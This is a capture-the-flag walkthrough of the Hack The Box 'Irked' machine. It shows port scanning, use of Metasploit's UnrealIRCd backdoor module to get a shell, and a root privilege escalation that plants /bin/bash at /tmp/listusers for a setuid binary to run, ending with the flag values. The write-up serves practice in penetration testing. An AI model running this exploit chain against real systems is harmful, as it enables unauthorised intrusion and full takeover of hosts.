Irked HTB Write-up

Machine IP - 10.10.10.117

Initial Phase

Starting with an nmap scan, we get the following result -

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 18:16 +04
Nmap scan report for 10.10.10.117
Host is up (0.25s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
60500/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds

We can check the IRC service. It can be searched for service enumeration, which gives us the hint that it is Unreal IRCd. This can be searched for exploits on metasploit as follows -

root@kali:~/Desktop/Hack The Box/irked# nmap -sV -p 6697 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 22:31 +04
Nmap scan report for 10.10.10.117
Host is up (0.20s latency).

PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds

Moving forward

From here, we can use metasploit for the exploit as follows -

root@kali:~/Desktop/Hack The Box/irked# msfconsole -q
msf5 > search unreal ircd

Matching Modules
================

   Name                                        Disclosure Date  Rank       Check  Description
   ----                                        ---------------  ----       -----  -----------
   exploit/linux/games/ut2004_secure           2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Linux)
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution
   exploit/windows/games/ut2004_secure         2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Win32)

###### trying the excellent one

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Check  Description
   ----                                ---------------  ----    -----  -----------
   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Started bind TCP handler against 10.10.10.117:4444
[*] Command shell session 1 opened (10.10.12.66:41567 -> 10.10.10.117:4444) at 2019-03-17 22:03:24 +0400

id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
python -c 'import pty; pty.spawn("/bin/bash");'
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd

This gives us the reverse shell from the vulnerable irc chat. Now to do a privilege escalation, we can do a search for the setuid binaries available to the ircd user. sudo -l seems to be a good starting point, but unfortunately returns nothing, in fact sudo isn't executable by the user. So, find command can be used instead as follows -

ircd@irked:~/Unreal3.2$ sudo -l
sudo -l
bash: sudo: command not found
ircd@irked:~/Unreal3.2$ find / -perm 4755 2>/dev/null
find / -perm 4755 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

The viewuser command seems to be the only odd one out i.e., all others seem to be a command that is generally present in a unix system. Therefore, we try running the command -

ircd@irked:~/Unreal3.2$ viewuser
viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-03-25 01:42 (:0)
sh: 1: /tmp/listusers: not found

The last line above is an error of bash where it is not able to find a binary /tmp/listusers to execute. Since the command viewuser is a setuid, maybe if it executes /bin/bash it can give a root shell. Therefore, we can try to create a file at the desired location, which is definitely in permissible bounds as tmp is writeable by all users.

ircd@irked:~/Unreal3.2$ echo "/bin/bash" > /tmp/listusers
echo "/bin/bash" > /tmp/listusers
ircd@irked:~/Unreal3.2$ chmod 777 /tmp/listusers
chmod 777 /tmp/listusers
ircd@irked:~/Unreal3.2$ viewuser
viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-03-25 01:42 (:0)
root@irked:~/Unreal3.2# cd ..
cd ..
root@irked:~# ls
ls
Unreal3.2
root@irked:~# cd ..
cd ..
root@irked:/home# ls
ls
djmardov  ircd
root@irked:/home# cd djmardov
cd djmardov
root@irked:/home/djmardov# ls
ls
Desktop  Documents  Downloads  Music  Pictures	Public	Templates  Videos
root@irked:/home/djmardov# cd Desktop
cd Desktop
root@irked:/home/djmardov/Desktop# ls
ls
root@irked:/home/djmardov/Desktop# cd ../..
cd ../..
root@irked:/home# cd /root
cd /root
root@irked:/root# cat root.txt
cat root.txt
8d8e9e8be64654b6dccc3bff4522daf3
root@irked:/root# cd /
cd /
root@irked:/# find / -name user.txt 2>/dev/null
find / -name user.txt 2>/dev/null
/home/djmardov/Documents/user.txt
root@irked:/# cat /home/djmardov/Documents/user.txt
cat /home/djmardov/Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e

Thus, we get root and can read both the flags.